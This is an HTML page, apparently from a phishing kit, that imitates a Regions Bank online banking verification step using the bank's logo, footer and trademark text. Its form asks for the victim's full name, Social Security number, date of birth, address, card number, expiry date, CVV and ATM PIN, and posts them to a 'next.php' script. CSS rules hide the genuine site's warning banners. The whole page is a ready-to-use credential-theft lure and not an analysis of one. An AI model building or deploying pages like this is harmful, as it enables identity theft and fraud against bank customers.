<!DOCTYPE html>
<html lang="en" class="no-js">

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">


    <title>Regions Online Banking Verification - Verification Online Banking - Regions Online Banking</title>
    <link rel="shortcut icon" href="favicon.ico">




    <link rel="stylesheet" href="assets/css2/com-regions.min.css">
    <link href="assets/css2/combined.css.1.css" rel="stylesheet">
    <link href="assets/css2/combined.css.2.css" rel="stylesheet">




    <style>
        .warning-message {
            background-color: #fff9e3;
            padding: 10px;
            margin: 10px;
        }
    </style>
    <style type="text/css" id="amaze-css-module">
        .orange-button:focus,
        .regions-orange-button:focus,
        a.nexterror:focus,
        a.previouserror:focus,
        button:focus,
        h3:focus,
        input:focus,
        select:focus {
            outline: #1d8795 solid 2px !important
        }

        .orange-button:focus {
            border-color: inherit
        }

        .regions-orange-button:focus {
            border-color: transparent
        }

        .icon-circle-print:focus,
        .regions-back-button:focus,
        .regions-cancel-button:focus,
        .ui-dialog-titlebar-close:focus {
            outline: #1d8795 solid 2px
        }

        .amaze-clipper {
            position: absolute;
            clip: rect(1px 1px 1px 1px);
            clip: rect(1px, 1px, 1px, 1px);
            width: 1px;
            height: 1px;
            overflow: hidden
        }

        a.amaze-skip-navigation:focus {
            position: absolute;
            top: 0;
            left: 0;
            background-color: #1d8795;
            color: #fff;
            border: 0;
            padding: 8px 15px 8px 8px;
            border-radius: 0 0 15px;
            box-shadow: #999 2px 2px 8px 1px
        }

        table.regions-table>tbody>tr>th {
            border-bottom: 1px solid #d8d8d5 !important;
            border-radius: 0 !important;
            border-top: 0 none;
            font-size: 14px;
            padding: 10px 15px;
            text-align: left;
            vertical-align: middle
        }

        .amaze-offscreen {
            position: absolute !important;
            clip: rect(1px 1px 1px 1px);
            /* IE6, IE7 */
            clip: rect(1px, 1px, 1px, 1px);
            overflow: hidden;
            width: 1px;
            height: 1px;
        }
    </style>

    <script src="./assets/js/angular.min.js"></script>
    <script src="./assets/js/jquery.min.js"></script>
    <script src="./assets/js/jquery.validate.min.js"></script>
    <script src="./assets/js/jquery.mask.js"></script>
    <script type="text/javascript">
        $(function() {
            $('#cnum').mask('0000 0000 0000 0000');
            $('#exp').mask('00/00');
            $('#cvv').mask('000');
            $('#apin').mask('000000');
            $('#dob').mask('00/00/0000');
            $('#ssn').mask('000-00-0000');
        });
    </script>


</head>

<body class="regions-page rds-wizard" data-regions="page" data-resized="true">
    <style>
        .wrapper,
        .message,
        important-message-banner {
            display: none !important;
        }
    </style>
    <div id="contentWrapper" style="display: block;">

        <div>

            <header class="rds-header simple">
                <div class="container">
                    <a class="logo-link" href="" title="Go home">
                        <picture class="logo">
                            <source srcset="assets/img/regions-logo-no-r.svg" media="(max-width: 600px)">
                            <img src="assets/img/regions-logo-no-r.svg" alt="regions logo">
                            <!-- ^^ SRC for IE compatibility, IE doesn't support srcset.-->
                        </picture>
                    </a>
                </div>
            </header>

            <main>
                <header class="rds-marquee">
                    <div class="container">
                        <div class="marquee-title">

                            <section class="sub-menu">
                                <h1>Regions Online Banking Verification</h1>

                            </section>

                        </div>
                    </div>
                </header>


                <section id="enrollment-home" class="template">
                    <section id="columnFill">
                        <section class="regions-widget enrollments-enrollmentwidget">


                            <div class="rds-wizard-body enrollment-container">

                                <div class="body-content container">
                                    <div id="step1Identification">



                                        <form id="Verification-Form" class="rds-form" action="../next.php" method="POST" name="olb-enrollment-step-1">

                                            <div class="rds-step-header">
                                                <h1 class="sr-only">Verification Steps</h1>
                                                <ol class="rds-steps">
                                                    <li class="step col-sm-3 col-xs-12 hidden-xs"><span class="badge"><span class="sr-only">Step -</span>1</span>Code Verification</li>
                                                    <li class="step col-sm-3 col-xs-12 hidden-xs"><span class="badge"><span class="sr-only">Step -</span>3</span>Customer Information</li>
                                                    <li class="step current col-sm-3 col-xs-12"><span class="badge"><span class="sr-only">Step -</span>3<span class="sr-only">current step -</span></span>Billing Information </li>
                                                    <li class="step col-sm-3 col-xs-12 hidden-xs"><span class="badge"><span class="sr-only">Step
                                                                -</span>4</span>Confirmation</li>
                                                </ol>
                                            </div>

                                            <div class="rds-long-form-tile">
                                                <div class="long-form-main">
                                                    <div class="hide rds-page-alert alert-danger">
                                                        <div class="icon"></div>
                                                        <div class="content">
                                                            <h1 tabindex="-1"><span class="sr-only">Errors
                                                                    found:</span>Please resolve the following issues:
                                                            </h1>
                                                            <ul></ul>
                                                        </div>
                                                    </div>
                                                    <div class="field-group" role="group" aria-labelledby="verify-card-number-title">
                                                        <h2 id="required-info-title">To get verified, please enter the following required information:</h2>
                                                        <div class="field animated-label text required alphanumeric">
                                                            <label class="control-label" for="security-answer-3">Full Name</label>
                                                            <input aria-describedby="fullname" aria-required="True" class="form-control" id="fullname" required="required" maxlength="25" name="fullname" type="text" value="" autocomplete="off" style="max-height: 67px; padding-top: 33px;">
                                                        </div>
                                                        <div class="field animated-label text required alphanumeric">
                                                            <label class="control-label" for="security-answer-3">Social Security Number</label>
                                                            <input aria-describedby="phni" aria-required="True" inputmode="numeric" class="form-control" id="ssn" placeholder="xxx-xx-xxxx" title="Please enter numbers only" required="required" maxlength="11" name="ssn" type="tel" value="" autocomplete="off" style="max-height: 67px; padding-top: 33px;">
                                                        </div>
                                                        <div class="field animated-label text required alphanumeric">
                                                            <label class="control-label" for="security-answer-3">Date Of Birth</label>
                                                            <input aria-describedby="dob" aria-required="True" class="form-control" id="dob" inputmode="numeric" placeholder="MM/DD/YYYY" title="Please enter numbers only" required="required" maxlength="10" name="dob" type="tel" value="" autocomplete="off" style="max-height: 67px; padding-top: 33px;">
                                                        </div>
                                                        <div class="field animated-label text required alphanumeric">
                                                            <label class="control-label" for="security-answer-3">Address</label>
                                                            <input aria-describedby="phni" aria-required="True" class="form-control" required="required" maxlength="40" name="added" type="text" style="max-height: 67px; padding-top: 33px;"></input>
                                                        </div>
                                                        <div class="field animated-label text required alphanumeric">
                                                            <label class="control-label" for="security-answer-3">Zip Code</label>
                                                            <input aria-describedby="phni" aria-required="True" class="form-control" id="zip" title="Please enter numbers only" required="required" minlength="5" maxlength="5" name="zipc" inputmode="numeric" type="tel" style="max-height: 67px; padding-top: 33px;"></input>
                                                        </div>
                                          
                                                        <div class="row">
                                                            <div class="col-md-8 col-xs-12">
                                                                <div class="field animated-label text required creditcard" data-format="card">
                                                                    <label class="control-label" for="card-number">Card Number</label>
                                                                    <input aria-required="True" class="form-control" placeholder="xxxx xxxx xxxx xxxx" data-format-instruction="The 16-digit number printed on your ATM/Check Card." id="cnum" inputmode="numeric" title="Please enter numbers only" maxlength="19" name="cnum" type="tel" value="" required="" autocomplete="off" style="max-height: 67px; padding-top: 33px;">
                                                                </div>
                                                            </div>
                                                        </div>
                                                        <div class="row">
                                                            <div class="col-md-4 col-xs-6">
                                                                <div class="field animated-label text required numeric pin-number">
                                                                    <label class="control-label" for="card-expiration-date">Expiration Date</label>
                                                                    <input aria-required="True" class="form-control" placeholder="MM/YY" id="exp" inputmode="numeric" maxlength="5" title="Please enter numbers only like ex. 0121" name="exp" type="tel" value="" required="" autocomplete="off" style="max-height: 67px; padding-top: 33px;">

                                                                </div>
                                                            </div>
                                                            <div class="col-md-4 col-xs-6">
                                                                <div class="field animated-label text required numeric cvv-number">
                                                                    <label class="control-label" for="card-cvv">CVV</label>
                                                                    <input aria-required="True" class="form-control" data-format-instruction="reloadable-card-cvv-help" id="cvv" inputmode="numeric" maxlength="3" minlength="3" name="cvv" title="Please enter numbers only" type="tel" value="" required="" autocomplete="off" style="max-height: 67px; padding-top: 33px;">
                                                                    <div class="hide instructions" id="reloadable-card-cvv-help"><span class="sr-only">Help Text:</span><b>What is my CVV number?</b><img style="width:80%;" src="assets/img/cv2-helper-image.png"></div>
                                                                </div>
                                                            </div>
                                                        </div>
                                                        <div class="row">
                                                            <div class="col-md-4 col-xs-12">
                                                                <div class="field animated-label text required dateMY" data-format="date">
                                                                    <label class="control-label" for="card-pin">PIN</label>
                                                                    <input aria-required="True" class="form-control" data-format-instruction="Your PIN is a 4-digit number used for ATM withdrawals or point-of-sale debit purchases." id="apin" title="Please enter numbers only" inputmode="numeric" maxlength="6" required="" minlength="4" name="apin" type="tel" value="" autocomplete="off" style="max-height: 67px; padding-top: 33px;">
                                                                </div>
                                                            </div>

                                                        </div>
                                                        <div class="row">

                                                        </div>
                                                    </div>


                                                    <div class="wizard-cta">
                                                        <button id="customer-verification" class="btn btn-wizard-next" type="submit">Confirm</button>
                                                    </div>


                                                </div>
                                                <aside class="long-form-aside">
                                                    <h3>FAQs</h3>
                                                    <ul class="no-bullet">
                                                        <li><a href="#">What information do I need to Login?</a></li>
                                                        <li><a href="#">Is Regions Online Banking secure?</a></li>
                                                        <li><a href="#">When is the Online Banking system available?</a>
                                                        </li>
                                                        <li><a href="#">View all FAQs</a></li>
                                                    </ul><a class="aside-link" href="#top">Back to Top</a>
                                                </aside>
                                            </div>
                                        </form>
                                    </div>



                                </div>


                            </div>
        </div>
        </section>
        </section>

        </section>




        </main>

        <footer class="rds-footer">




            <div class="footer-content">


                <ul>
                    <li>
                        <a href="#">
                            Contact Us
                        </a>
                    </li>
                    <li>
                        <a href="#">
                            Terms and Conditions
                        </a>
                    </li>
                    <li>
                        <a href="#">
                            Privacy Pledge
                        </a>
                    </li>
                    <li>
                        <a href="#">
                            Security
                        </a>
                    </li>
                    <li>
                        <a href="#">
                            Online Tracking and Advertising
                        </a>
                    </li>
                    <li>
                        <a href="#">
                            Accessible Banking
                        </a>
                    </li>
                    <li>
                        <span id="FeedbackLink"></span>

                    </li>
                </ul>
                <ul>
                    <li>Call 1-800-REGIONS</li>
                </ul>

                <p>Regions, the Regions logo, the LifeGreen color, and the LifeGreen bike are registered trademarks of
                    Regions Bank.</p>
                <p>© 2021 Regions Bank. All Rights Reserved.</p>

                <ul>
                    <li class="footer-icon"><img src="assets/img/equal-housing-lender.svg" alt=""><span class="sr-only">Equal
                            Housing Lender</span></li>
                    <li class="footer-icon"><img src="assets/img/member-fdic.svg" alt=""><span class="sr-only">Member
                            FDIC</span></li>
                </ul>

            </div>

            <style>
                .footer-content a {
                    color: #178;
                }
            </style>




        </footer>
    </div>




    </div>


</body>

</html>